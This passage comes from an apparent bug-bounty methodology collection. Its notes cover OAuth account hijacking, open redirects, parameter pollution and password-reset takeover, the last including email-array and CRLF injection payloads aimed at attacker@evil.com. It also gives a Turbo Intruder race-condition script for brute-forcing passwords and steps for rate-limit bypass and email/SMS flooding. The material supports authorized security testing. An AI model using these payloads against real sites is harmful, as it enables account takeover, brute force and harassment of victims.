 26 | - Now, after the user login to their account with the OAuth provider and gives consent to access their data. the user will be redirected to the `/callback` endpoint that was specified in the `redirect_uri` parameter of the authorization request. The resulting `GET` request will contain the authorization code as a query parameter.
 27 | 
 28 | **Authorization code grant**
 29 | 
 30 | ```
 31 | GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1 
 32 | Host: client-app.com
 33 | ```
 34 | 
 35 | - Rest of the stuff like access token grant and API calls are done in the back-end so you cannot see them in your proxy.
 36 | 
 37 | ```md
 38 | **factors that determine authorization code flow:**
 39 | - Initial authorization request has `response_type=code`
 40 | - the `/callback` request contains authorization code as a parameter.
 41 | ```
 42 | 
 43 | ### <ins>Implicit grant type</ins>
 44 | 
 45 | **Authorization request**
 46 | - The implicit flow starts in pretty much the same way as the authorization code flow. The only major difference is that the `response_type` parameter must be set to `token`.
 47 | 
 48 | ```
 49 | GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 
 50 | Host: oauth-authorization-server.com
 51 | ```
 52 | 
 53 | **Access Token grant**
 54 | 
 55 | - If the user logs in and gives their consent to the request access , the oauth service redirects the user to the `/callback` endpoint but instead of sending a parameter containing an authorization code, it will send the access token and other token-specific data as a URL fragment.
 56 | 
 57 | ```
 58 | GET /callback#access_token=z0y9x8w7v6u5&token_type=Bearer&expires_in=5000&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 
 59 | Host: client-app.com
 60 | ```
 61 | 
 62 | 
 63 | ```md
 64 | **factors that determine Implicit flow:**
 65 | - Initial authorization request has `response_type=token`
 66 | - the `/callback` request contains access token as a parameter.
 67 | ```
 68 | 
 69 | ---
 70 | 
 71 | *Now that you have determined which grant type the OAuth service uses , you can proceed to find bugs.*
 72 | 
 73 | ### Method-1 (Auth bypass in OAuth implicit flow)
 74 | - To log the user in every time with oauth , the client application sends a POST request to the server containing user info (email-id, username) and access token to generate a session cookie.
 75 | 	- so, find a POST req in http history which contains user-info and access token.
 76 | - Usually in implicit flow , the server doesn't validate the access token so you can change the parameters like email-id and/or username to impersonate another user and bypass authentication.
 77 | 
 78 | ### Method-2 (Forced profile linking)
 79 | - This is similar to a traditional CSRF attack so the impact may not be that much.
 80 | - In this when you sign in with social media profile, you will be redirected to the social media website and then you log in with social media credentials.
 81 | - Now the next time when you log in , you will be logged in instantly. capture this request with burp.
 82 | - In the http history there would be a request similar to `/auth?client_id[...]` . In that request the redirect_uri sends the authorization code to something like `/oauth-linking`. Check if the `state` parameter is present. if its not present then it is vulnerable to CSRF attacks. because that means there is no way for server to verify if this information is from the same user.
 83 | - So absence of `state` parameter in this request is itself a vulnerability.
 84 | - Past this you can try sending the exploit link to the victim and complete the oauth flow by attaching your social media profile to their account.
 85 | 	- For this copy URL of the request in burp and drop the request so that the code isn't used.
 86 | 	- Turn off intercept and log out of website.
 87 | 	- Now you can send this link to the victim or you can set it as an iframe on your website `<iframe src="request URL"></iframe>`.  and deliver your website link to the victim.
 88 | 	- When their browser loads the `iframe`, it will complete the OAuth flow using your social media profile, attaching it to the victim account.
 89 | 
 90 | ### Method-3 (Account hijacking via redirect_uri)
 91 | - Complete the oauth sign in flow and log out then log back in and you will be logged in instantly this time.
 92 | - Find the most recent Authorization request in http history, it should be similar to `GET /auth?client_id=[...]`.
 93 | - Check the redirect_uri param and try to change it. If you can redirect it to an external site then good , if not then try different endpoints on the same website and check if they work.
 94 | - if there is an open redirect then change the redirect_uri to your webhook site link and follow the redirect. 
 95 | - Now check for a log entry in webhook.site containing an authorization code.
 96 | - So now you can send the request url to the victim (or make an iframe as mentioned above) with redirect_uri set as your webhook site and leak their authorization codes.
 97 | - If the victim clicks on the link then you would see the authorization code in your webhook.site logs.
 98 | - now you can use this stolen code in the callback request and the rest of the OAuth flow will be completed automatically and you will be logged in as the admin user.
 99 | 
100 | ## Author:
101 | [Pyr0sec](https://twitter.com/Pyr0sec)
102 | 


--------------------------------------------------------------------------------
/OAuth/README.md:
--------------------------------------------------------------------------------
 1 | # Some MindMap
 2 | ---
 3 | ### OAuth by Hack3rSr0lls
 4 | ![https://pbs.twimg.com/media/EZ1WqmcXYAAqwSH?format=jpg&name=900x900](https://pbs.twimg.com/media/EZ1WqmcXYAAqwSH?format=jpg&name=900x900)
 5 | 
 6 | ### Source
 7 | * [https://twitter.com/hackerscrolls/status/1269266750467649538](https://twitter.com/hackerscrolls/status/1269266750467649538)
 8 | 
 9 | ### Author
10 | * [KathanP19](https://twitter.com/KathanP19)
11 | 


--------------------------------------------------------------------------------
/Open_Redirection/Open_Redirection_Bypass.md:
--------------------------------------------------------------------------------
 1 | # Open Redirection Bypass Trick:
 2 | 
 3 | This bypass I found in a application while I doing pentesting. I hope it will helps you too!
 4 | 
 5 | 1. While you I trying to redirect https://targetweb.com?url=http://attackersite.com it did not redirected!
 6 | 2. I Created a new subdomain with with www.targetweb.com.attackersite.com
 7 | 3. And when I tried to redirect with https://targetweb.com?url=www.targetweb.com.attackersite.com
 8 | 4. It will successfully redirected to the www.targetweb.com.attackersite.com website!
 9 | 5. Due to the bad regex it has been successfully bypass their protection!
10 | 
11 | ### Authors:
12 | * [@bishal0x01](https://twitter.com/bishal0x01)
13 | 
14 | ### Reference Tweets:
15 | * https://twitter.com/bishal0x01/status/1262021038080053248
16 | 


--------------------------------------------------------------------------------
/Open_Redirection/find_OpenRedirect_trick.md:
--------------------------------------------------------------------------------
 1 | ## A small trick to find Open Redirection if you couldn't find any Redirection parameters.
 2 | 
 3 | *"I apply this everytime while testing web applications and found many Open Redirects and even an XSS using this trick!"*
 4 | 
 5 | ### Steps:
 6 | ------------------------------------------------------------------------------------------------------------------------------------------------------------
 7 |       1. If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the user.
 8 |       
 9 |       2. Go to your user profile page , for example : samplesite.me/accounts/profile
10 |       
11 |       3. Copy the profile page's URL
12 |       
13 |       4. Logout and Clear all the cookies and go to the homepage of the site.
14 |       
15 |       5. Paste the Copied Profile URL on the address bar 
16 |       
17 |       6. If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following
18 |             - https://samplesite.me/login?next=accounts/profile
19 |             - https://samplesite.me/login?retUrl=accounts/profile
20 |       
21 |       7. Try to exploit the parameter by adding an external domain and load the crafted URL
22 |           eg:- https://samplesite.me/login?next=https://evil.com/
23 |                          (or)
24 |             https://samplesite.me/login?next=https://samplesite.me@evil.com/  #(to beat the bad regex filter)
25 |       
26 |       8. If it redirects to evil.com , thers's your open redirection bug.
27 |        
28 |       9. Try to leverage it to XSS
29 |            eg:- https://samplesite.me/login?next=javascript:alert(1);//
30 | 
31 | -------------------------------------------------------------------------------------------------------------------------------------------------------------
32 |        
33 |  #### Author:  [febinrev](https://twitter.com/febinrev) 
34 | 


--------------------------------------------------------------------------------
/Parameter_Pollution/Parameter_Pollution_in_social_sharing_buttons.md:
--------------------------------------------------------------------------------
 1 | # Parameter Pollution in social sharing buttons
 2 | 
 3 | Hi Guys,
 4 | Though it is not severe bug.But still some organizations take this seriously.
 5 | 
 6 | ## Steps :
 7 | 
 8 | ```
 9 | 1.Browse through your target.
10 |   say https://target.com
11 | 2.Find a article or blog present on target website which must have a link to share that blog on different social networks such as
12 |   Facebook,Twitter etc.
13 | 3.Let's say we got and article with url:
14 |   https://taget.com/how-to-hunt 
15 |   then just appened it with payload ?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya
16 |   so our url will become 
17 |   https://taget.com/how-to-hunt?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya
18 | 4.Now hit enter with the abover url and just click on share with social media.
19 |   Just observe the content if it is including our payload i.e. https://attacker.com
20 |   Then it is vulnerable or else try next target.
21 | ```  
22 | ## References:
23 | * https://hackerone.com/reports/105953
24 | * Google
25 |   
26 | ## Author
27 | * [KenAdams000](https://twitter.com/KenAdams000)
28 | 


--------------------------------------------------------------------------------
/Password_Reset_Functionality/Account_Takeover_By_Password_Reset_Functionality.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ```
 3 | 1. email= victim@gmail.com&email=attacker@gmil.com
 4 | 2. email= victim@gmail.com%20email=attacker@gmil.com
 5 | 3. email= victim@gmail.com |email=attacker@gmil.com
 6 | 4. email= victim@gmail.com%0d%0acc:attacker@gmil.com
 7 | 5. email= victim@gmail.com&code= my password reset token
 8 | ```
 9 | ### Authors
10 | 
11 | @tamimhasan404
12 | 


--------------------------------------------------------------------------------
/Password_Reset_Functionality/Password_Reset_Flaws_by_Sm4rty.md:
--------------------------------------------------------------------------------
 1 | # Common security flaws in password reset functionality compiled from twitter, writeups, disclosed reports:
 2 | 
 3 | ## 1. Password Reset Token Leak Via Referrer
 4 | 
 5 | - The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested.
 6 | The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed 
 7 | 
 8 | Exploitation:
 9 | ```
10 |     Request password reset to your email address
11 |     Click on the password reset link
12 |     Dont change password
13 |     Click any 3rd party websites(eg: Facebook, twitter)
14 |     Intercept the request in burpsuite proxy
15 |     Check if the referer header is leaking password reset token.
16 | ``` 
17 |   
18 | ## 2. Sending an array of email addresses instead of a single email address.
19 | 
20 | - In this attack the The attacker can send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address and It could lead to full account takeover.
21 | 
22 | ```
23 | POST https://example.com/api/v1/password_reset HTTP/1.1
24 | Original Request Body:
25 | {“email_address”:”xyz@gmail.com”}
26 | Modified Request Body:
27 | {“email_address”:[“admin@breadcrumb.com”,”attacker@evil.com”]}
28 | ```
29 | - In this way, the password reset link get send to both victim as well as attacker. And the attacker can use it to gain Full account Takeover.
30 | 
31 | ## 3. Bruteforcing OTP for Reseting Password.
32 | 
33 | - Now, In case The password reset functionality of application is based on OTP validation.
34 | - Many program accepts No rate limit as acceptable risk. So, Bruteforcing OTP is worth trying.
35 | - You can reset the password of an account by intercepting the request for OTP validation and bruteforcing the 6 digit number.
36 | - Using this, it is possible to change and reset the password of any account, by changing the user data and brute-forcing the reset OTP.
37 |   
38 | Exploitation:
39 | ```
40 |       1. Start the Burp Suite and Intercept the password reset request
41 |       2.Send to intruder
42 |       3.Use null payload
43 | ```
44 | 
45 | ## 4. Full Account Takeover via Changing Email And Password of any User through API Parameters
46 | 
47 | Exploitation:
48 | ```
49 |     1. Attacker have to login with their account and Go to the Change password function
50 |     2. Start the Burp Suite and Intercept the request
51 |     3. After intercepting the request sent it to repeater and modify parameters Email and Password
52 |       POST /api/changepass
53 |       [...]
54 |       ("form": {"email":"victim@email.tld","password":"12345678"})
55 | ```      
56 |       
57 |       
58 | ## 5. Response manipulation: Replace Bad Response With Good One
59 | 
60 | - Look for Request and Response like these
61 | ```
62 | HTTP/1.1 401 Unauthorized
63 | (“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
64 | ```
65 | - Change Response
66 | ```
67 | HTTP/1.1 200 OK
68 | (“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
69 | ```
70 | 


--------------------------------------------------------------------------------
/Password_Reset_Functionality/Password_Reset_Token_Leakage.md:
--------------------------------------------------------------------------------
 1 | Password Reset Token Leakage
 2 |     
 3 |     Steps:
 4 |     1.Sent a password reset request using forget password
 5 | 	2.Check your email 
 6 | 	3.copy your reset page link and paste in another tab and make burp intercept on.
 7 | 	4.Look for every request if you find similiar token that is in reset link with other domain like: bat.bing.com or facebook.com
 8 | 	5.Than there is reset password token leakage.
 9 | 
10 | ### Authors
11 | 
12 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
13 | 


--------------------------------------------------------------------------------
/Password_Reset_Functionality/README.md:
--------------------------------------------------------------------------------
1 | # Password Reset Mindmap
2 | ![https://pbs.twimg.com/media/EhN29bpU8AMvLxx?format=jpg&name=medium](https://pbs.twimg.com/media/EhN29bpU8AMvLxx?format=jpg&name=medium)
3 | 
4 | # Source
5 | * [Twitter](https://twitter.com/N008x/status/1302515523557548032/photo/1)
6 | * [Blog](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
7 | # Authors
8 | * [KathanP19](https://twitter.com/KathanP19)
9 | 


--------------------------------------------------------------------------------
/Password_Reset_Functionality/Top_5_Password_Reset_Bugs:
--------------------------------------------------------------------------------
 1 | Common security flaws in password reset functionality compiled from twitter, writeups, disclosed reports:
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 1. Password Reset Token Leak Via Referrer
 7 | 
 8 | The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested.
 9 | The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed 
10 | 
11 | Exploitation
12 |     Request password reset to your email address
13 |     Click on the password reset link
14 |     Dont change password
15 |     Click any 3rd party websites(eg: Facebook, twitter)
16 |     Intercept the request in burpsuite proxy
17 |     Check if the referer header is leaking password reset token.
18 |     
19 |     
20 |     
21 |     
22 | 2. Sending an array of email addresses instead of a single email address.
23 | 
24 | In this attack the The attacker can send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address and It could lead to full account takeover.
25 | 
26 | POST https://example.com/api/v1/password_reset HTTP/1.1
27 | Original Request Body:
28 | {“email_address”:”xyz@gmail.com”}
29 | Modified Request Body:
30 | {“email_address”:[“admin@breadcrumb.com”,”attacker@evil.com”]}
31 | 
32 | In this way, the password reset link get send to both victim as well as attacker. And the attacker can use it to gain Full account Takeover.
33 | 
34 | 
35 | 
36 | 
37 | 3. Bruteforcing OTP for Reseting Password.
38 | 
39 |   Now, In case The password reset functionality of application is based on OTP validation.
40 |   Many program accepts No rate limit as acceptable risk. So, Bruteforcing OTP is worth trying.
41 |   You can reset the password of an account by intercepting the request for OTP validation and bruteforcing the 6 digit number.
42 |   Using this, it is possible to change and reset the password of any account, by changing the user data and brute-forcing the reset OTP.
43 |   
44 |     Exploitation
45 |       1. Start the Burp Suite and Intercept the password reset request
46 |       2. Send to intruder
47 |       3. Use null payload
48 |   
49 |   
50 |   
51 |   
52 | 4. Full Account Takeover via Changing Email And Password of any User through API Parameters
53 | Exploitation
54 | 
55 |     1. Attacker have to login with their account and Go to the Change password function
56 |     2. Start the Burp Suite and Intercept the request
57 |     3. After intercepting the request sent it to repeater and modify parameters Email and Password
58 |       POST /api/changepass
59 |       [...]
60 |       ("form": {"email":"victim@email.tld","password":"12345678"})
61 |       
62 |       
63 |       
64 | 5. Response manipulation: Replace Bad Response With Good One
65 | 
66 | Look for Request and Response like these
67 | HTTP/1.1 401 Unauthorized
68 | (“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
69 | 
70 | Change Response
71 | HTTP/1.1 200 OK
72 | (“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
73 | 
74 | -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
75 |  I have written a medium blog on this topic if you want to checkit out : https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef   
76 |  -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
77 |      
78 | 


--------------------------------------------------------------------------------
/Race_Condition/race_conditions.md:
--------------------------------------------------------------------------------
  1 | # RACE CONDITIONS
  2 | ## What is Race conditions ? 
  3 |  - Race conditions are a common type of vulnerability closely related to business [logic flaws](https://portswigger.net/web-security/logic-flaws). 
  4 |  - They occur when websites process requests concurrently without verifying. This can lead to multiple distinct threads interacting with the same data at the same time, resulting in a "collision" that causes unintended behavior in the application.
  5 | 
  6 |  <hr>
  7 |  
  8 | ## Limit over run RC (Exploiting Logic Flaws) 
  9 | - There are some basic RC tests that you can try in the context of Logic Flaws.
 10 |   - Invite user
 11 |   - Joining a group
 12 |   - Like, subscribe, follow, unfollow, Vote ..etc that required limit. 
 13 | 
 14 | ### This method required Burp version 2023.9.x or higher (This is the easiest method to exploit, you can create your own script also.)
 15 | 1 - Send the request to repeater for `'n' no. of times`.
 16 | 
 17 | 2 - Create a Tab for all those request and choose `Send Parallel (single Packet Attack)`
 18 | 
 19 | 3 - Hit send , if application is Vulnerable, you'll see the magic.
 20 | <hr>
 21 | 
 22 | ## Rate-Limit Bypass via RC
 23 | 
 24 | 1 - Select the parameter in request that you want to bruteforce(let's say password), and `send the request into TurboIntruder`.
 25 | 
 26 | 2 - If it is password or something , then wordlist should be copied in your clipboard that and use the below python script in Turbo Intruder.
 27 | 
 28 | ```
 29 | def queueRequests(target, wordlists):
 30 | 
 31 |     # as the target supports HTTP/2, use engine=Engine.BURP2 and concurrentConnections=1 for a single-packet attack
 32 |     engine = RequestEngine(endpoint=target.endpoint,
 33 |                            concurrentConnections=1,
 34 |                            engine=Engine.BURP2
 35 |                            )
 36 |     
 37 |     # assign the list of candidate passwords from your clipboard
 38 |     passwords = wordlists.clipboard
 39 |     
 40 |     # queue a login request using each password from the wordlist
 41 |     # the 'gate' argument withholds the final part of each request until engine.openGate() is invoked
 42 |     for password in passwords:
 43 |         engine.queue(target.req, password, gate='1')
 44 |     
 45 |     # once every request has been queued
 46 |     # invoke engine.openGate() to send all requests in the given gate simultaneously
 47 |     engine.openGate('1')
 48 | 
 49 | def handleResponse(req, interesting):
 50 |     table.add(req)
 51 | ```
 52 | 
 53 | 3 - Hit Attack and see the magic.
 54 | 
 55 | <hr>
 56 | 
 57 | ## Multi-Endpoint Race Conditions
 58 | 
 59 | 1 - When a single functionality chains with multiple request , eg - `Buying a product from a E-Commerce application`
 60 | 
 61 |     - /product --> for the product
 62 |     - /cart    --> Add to cart that product
 63 |     - /cart/checkout  --> Buy that product
 64 | 
 65 | 2 - Send all the required request into burp repeater for the product you want in a sequence and create a Tab.
 66 | 
 67 | 3 - Select `Send Parallel (single Packet Attack)` and hit send.
 68 | 
 69 | <hr>
 70 | 
 71 | ##  Single Endpoint RaceCondition
 72 | 
 73 |  - If you've facing a functionality where new objects edit the older object and require email verification, then we can test there for RaceConditions, Eg. Email Change functionality
 74 | 
 75 |        `Account A : Attacker --> attacker@email.com` 
 76 |        `Account B : Victim --> victim@email.com`
 77 | 
 78 | 1 - Application has email change functionality, where the new requested email is updated over older email, and send the confirmation link to the user email address.
 79 |   
 80 | 2 - Since, email is updated in DataBase and only confirmation is needed, 
 81 |    
 82 | 3 - So we `Send Parallel (Single Packet Attack)` of the changing email for,
 83 | ```
 84 | attacker@email.com
 85 | victim@email.com
 86 | ```
 87 | 4 - In Backend, Because we request so much fast that when application server generate confirmation link for `attacker@email.com` at the same time `victim@email.com` request is also reach their and application got confused to prioritise , As a result it sends both confirmation links on the same email.
 88 | 
 89 | 5 - Impact : This will lead to Full Acount Takeover.
 90 | 
 91 | <hr>
 92 | 
 93 | ## Time Sensitive Vulnerabilities
 94 | 1 - Send two parallel `forget password` request for `Attacker i..e Account-A`
 95 | 
 96 | 2 - If both `password reset links contains same token`, then we can test their for ATO.
 97 | 
 98 | 3 - This time send both request again by `changing victim's username/password in one of them`.
 99 | 
100 | 4 - Analyze the response time, if `both request have same response time`, then their might be chances of ATO
101 | 
102 | <hr><hr>
103 | 
104 | # REAL World Cases : (H1 reports)
105 | 
106 | ### 1 - Race condition in flag submission
107 |    - [Found in --> HackerOne](https://hackerone.com/reports/454949)
108 |    - Report describes a Race Condition Vulnerability which `allow an authenticated user to submit the same ctf Flag multiple times`. Increasing the user points and therefore the chances to get an invitation to a private program.
109 | 
110 | ### 2 - Race condition on Invite user action
111 |    - [Found in --> Omise](https://hackerone.com/reports/1285538)
112 |    - Race condition vulnerability which `allows the invitation of the same member multiple times to a single team` via the dashboard.
113 | 
114 | ### 3 - Race condition in performing retest allows duplicated payments
115 |    - [Found in --> HackerOne](https://hackerone.com/reports/429026)
116 |    - By executing `multiple requests to confirm a retest at the same time`, a malicious user is paid multiple times for the retest. This `allows for stealing money from HackerOne`, which could go unnoticed by both HackerOne and the attacker.
117 | 
118 | ### 4 - Race Condition leads to Un-Deletable group member
119 |    - [Found in --> HackerOne](https://hackerone.com/reports/604534)
120 |    - Small Race condition bug in which a group `user couldn't be removed from the group even by the admin` after they join.
121 | 
122 | ### 5 - Race Condition when following a user
123 |    - [Found in --> every.org](https://hackerone.com/reports/927384)
124 |    - Race condition vulnerability when following a user. If you send the Follow requests asynchronously, you can `follow a user multiple times instead getting an error message`.
125 | 
126 | ### 6 - Race Conditions in Popular reports feature.
127 |    - [Found in --> HackerOne](https://hackerone.com/reports/146845)
128 |    - This report describes a race condition bug which `allow an authenticated user to upvote or downvote multiple times a single report`, increasing its counter (and its rank on the hacktivity page).
129 | 
130 | ### 7 - Race condition in joining CTF group
131 |    - [Found in --> HackerOne](https://hackerone.com/reports/1540969)
132 |    - A race condition in https://ctf.hacker101.com/group/join `allows a user to join the same CTF group multiple times`.The user will show up in the group member list multiple times, and affect the group statistics.
133 | 
134 | ### 8 - Race conditions can be used to bypass invitation limit
135 |    - [Found in --> KeyBase](https://hackerone.com/reports/115007)
136 |    - Using Race conditions, attacker was `able to send out a total of 7 invites to his throwaway emails, obviously bypassing the 3 no. of invitations limit`.
137 | 
138 | ### 9 - Race Condition allows to redeem multiple times gift cards.
139 |    - [Found in --> Reverb.com](https://hackerone.com/reports/759247)
140 |    - I've found a Race Condition vulnerability which `allows to redeem gift cards multiple times`. This how an attacker can easily buy stuff just buying one gift card and redeem it over and over again.
141 | 


--------------------------------------------------------------------------------
/Rate_limit/No Rate-Limit on Verify-PhoneNo.md:
--------------------------------------------------------------------------------
 1 | ## Flaw-Name : Unlimited SMS Triggering
 2 | ---
 3 | ### Steps To Reproduce 
 4 | - 1 - Open this url `https://target.com/phone-number-verify`
 5 | - 2 - Enter the `victim's mob. number`
 6 | - 3 - `Intercept the request` and send the request to intruder
 7 | - 4 - Use payload type as `NULL payloads` and set the payload count & `start attack`
 8 | ---
 9 | ### Impact : 
10 | - If the company is using any email service software API(such as AWS,GCP..etc) or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted.
11 | ---
12 | ### Mitigation - 
13 | 
14 | - 1 - IP Based Blocking
15 | - 2 - Captcha
16 | - 3 - Firewall
17 | - 4 - Reducing the number of API requests
18 | 


--------------------------------------------------------------------------------
/Rate_limit/No Rate-limit on Invite User.md:
--------------------------------------------------------------------------------
 1 | ## Flaw-Name : No rate limit on invite user leads to email triggering
 2 | ---
 3 | 
 4 | ### Description : 
 5 | - Rate limiting is a strategy for limiting network traffic. It puts a cap on how often someone can repeat an action within a certain timeframe – for instance, trying to log in to an account.
 6 | 
 7 | ---
 8 | ### Steps To Reproduce 
 9 | - 1 - Go to `https://target.com/`
10 | - 2 - Navigate to `Invite User` option and Enter the `victim's email` 
11 | - 3 - Send invite & `Intercept` the Request
12 | - 4 - Send the request to `Intruder` & clear payload positions
13 | - 5 - Apply payload type as `null payload` and payload count as 100
14 | - 5 - Click on `Start attack` after applying the threads
15 | - 6 - The victim will get huge number of emails
16 | ---
17 | ### Impact : 
18 | - If the company is using any email service software API(such as AWS,GCP..etc) or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted.
19 | ---
20 | ### Mitigation - 
21 | 
22 | - 1 - IP Based Blocking
23 | - 2 - Captcha
24 | - 3 - Firewall
25 | - 4 - Reducing the number of API requests
26 | 


--------------------------------------------------------------------------------
/Rate_limit/No Rate-limit on Promo.md:
--------------------------------------------------------------------------------
 1 | ## No Rate-Limit on Promo
 2 | 
 3 | ### Steps To Reproduce:
 4 | - 1) Go to URL - `https://abc.target.com/product/121/checkout/promo`
 5 | - 2) Navigate to `Offer/Promo/Coupon code` option
 6 | - 3) Enter the random digit
 7 | - 4) `Intercept the Request` and Send to intruder
 8 | - 5) Apply payload & `Start attack`
 9 | 
10 | ### Impact : 
11 | - Financial Loss, an attacker can easily bruteforce all promo/coupon/Offer codes.


--------------------------------------------------------------------------------
/Rate_limit/No Rate-limit on Verify-email.md:
--------------------------------------------------------------------------------
 1 | ## Flaw-Name : Unlimited Email Triggering
 2 | ---
 3 | ### Steps To Reproduce :
 4 | - 1 - Navigate to : `https://abc.target.com/verify-email`
 5 | - 2 - `Intercept` the request in BurpSuite
 6 | - 3 - Send the request to `Intruder` and clear the payload position
 7 | - 4 - Use `Null payloads` as payload type and set the payload count to 100
 8 | - 5 - `Start attack`
 9 | 
10 | ---
11 | ### Impact : 
12 | - If the company is using any email service software API or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted.
13 | ---
14 | ### Mitigation :
15 | 
16 | - 1 - IP Based Blocking
17 | - 2 - Captcha
18 | - 3 - Firewall
19 | - 4 - Reducing the number of API requests
20 | 


--------------------------------------------------------------------------------
/Rate_limit/No Rate-limit on forget-password.md:
--------------------------------------------------------------------------------
 1 | ## Flaw-Name : No rate limit on forget/reset password leads to email triggering
 2 | ---
 3 | ### Steps To Reproduce 
 4 | - 1 - Navigate to : `https://abc.target.com/forgot-password` or it could be `https://abc.target.com/reset-password`
 5 | - 2 - Enter the email of the victim
 6 | - 3 - `Intercept` the request in burp suite
 7 | - 4 - Send the request to the `Intruder` and clear payload positions
 8 | - 5 - Use `Null payloads` and set the payload count to 100
 9 | - 6 - `Start attack`
10 | 
11 | 
12 | ---
13 | ### Impact : 
14 | - If the company is using any email service software API or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted.
15 | ---
16 | ### Mitigation :
17 | 
18 | - 1 - IP Based Blocking
19 | - 2 - Captcha
20 | - 3 - Firewall
21 | - 4 - Reducing the number of API requests


--------------------------------------------------------------------------------
/Rate_limit/README.md:
--------------------------------------------------------------------------------
 1 | ## RATE LIMIT FLAWS
 2 | This flaw leveraged by malicious actors to perform DDoS, brute force, and bot attacks on APIs. Although it's more than that.
 3 | ##### NOTE: Some organisation `keep rate-limit bug as OOS`, So check their policy before testing.
 4 | ## Rate-limit Checks
 5 | 1 - Rate limit on Forget password
 6 | 2 - Rate limit on Sign-up Page
 7 | 3 - Rate limit on Login Page
 8 | 4 - Rate limit on Invite user normal
 9 | 5 - Rate limit on Invite user using MACROS
10 | 6 - Rate limit on 2FA
11 | 7 - Rate-limit on Comment and sent messages
12 | 8 - Use your own brain somewhere
13 | 
14 | ## Bypass-Techniques
15 | #### 1 - Append NULL characters at the end of the request : 
16 | `%00, %0d%0a, %0d, %0a, %09, %0C, %20, ( )space`
17 | 
18 |     POST /signup/new/1337 HTTP/1.1
19 |     HOST: api.target.com
20 |     ...
21 |     email=hacker%40gmail.com&password=12345678%00
22 | #### 2 - Append NULL characters at the end of the Path : 
23 | `%00, %0d%0a, %0d, %0a, %09, %0C, %20, ( )space`
24 | `POST /profile/post/like%00 HTTP/2`
25 | 
26 | #### 3) Using Custom `HTTP headers`
27 | 	X-Originating-IP: 127.0.0.1
28 | 	X-Forwarded-For: 127.0.0.1
29 | 	X-Remote-IP: 127.0.0.1
30 | 	X-Remote-Addr: 127.0.0.1
31 | 	X-Client-IP: 127.0.0.1
32 | 	X-Host: 127.0.0.1
33 | 	X-Forwared-Host: 127.0.0.1
34 | 
35 | ---
36 | 	X-Originating-IP: 127.0.0.2
37 | 	X-Forwarded-For: 127.0.0.2
38 | 	X-Remote-IP: 127.0.0.2
39 | 	X-Remote-Addr: 127.0.0.2
40 | 	X-Client-IP: 127.0.0.2
41 | 	X-Host: 127.0.0.2
42 | 	X-Forwared-Host: 127.0.0.2
43 | ---
44 | 	X-Originating-IP: 127.0.1
45 | 	X-Forwarded-For: 127.0.1
46 | 	X-Remote-IP: 127.0.1
47 | 	X-Remote-Addr: 127.0.1
48 | 	X-Client-IP: 127.0.1
49 | 	X-Host: 127.0.1
50 | 	X-Forwared-Host: 127.0.1
51 | 
52 | #### 4 - Changing the value of `User-Agent:`
53 |     UserAgent: 'CHANGED_USERAGENT'
54 | 
55 | #### 5 - Adding Custom `parameter` in GET request
56 | `GET /accout/passwordreset/?test=test`
57 | 
58 | #### 6 - Change request body, (`JSON -> XML`) or vice versa
59 |    Use Burp Extension --> `Content Type Converter`
60 | 
61 | #### 7 - Changing API version , 
62 | `/api/v2/user/reset_pw --> /api/v1/user/reset_pw or /api/v3/user/reset_pw`
63 | 
64 | #### 8 - Bypass through Exploiting Logic flaw on Login page, 
65 |    - Take Attacker and Victim account
66 |    - Identify how many enough login attempts in application
67 |    - For-eg. if application gives only 3 attempts, then
68 |    - By using burp macros, send the attackers login request 1 time and victim login request 2 time, or alternatively 
69 |    - If NOT blocked, Repeat the process until we get victim's password
70 | #### 9 - Try to find `Origin IP` of the Application
71 |    - Shodan
72 |    - Censys
73 |    - Visit the application with it's IP address 
74 |    - Do your own research


--------------------------------------------------------------------------------
/Rate_limit/RateLimitBypass.md:
--------------------------------------------------------------------------------
 1 | # Rate Limit Bypass Techniques 
 2 | ## There are two ways to do that 
 3 | - Customizing HTTP Methods
 4 | - Adding Headers to Spoof IP
 5 | 
 6 | ## 1. Customizing HTTP Methods
 7 | - If the request goes on GET try to change it to POST, PUT, etc.,
 8 | - If you wanna bypass the rate-limit in API's try HEAD method.
 9 | 
10 | ## Rate Limit Bypass using Header 
11 | 
12 | Use the following Header just Below the Host Header 
13 | 
14 | ```
15 | X-Forwarded-For: IP
16 | X-Forwarded-IP: IP
17 | X-Client-IP: IP
18 | X-Remote-IP: IP
19 | X-Originating-IP: IP
20 | X-Host: IP
21 | X-Client: IP
22 | 
23 | #or use double X-Forwarded-For header
24 | X-Forwarded-For:
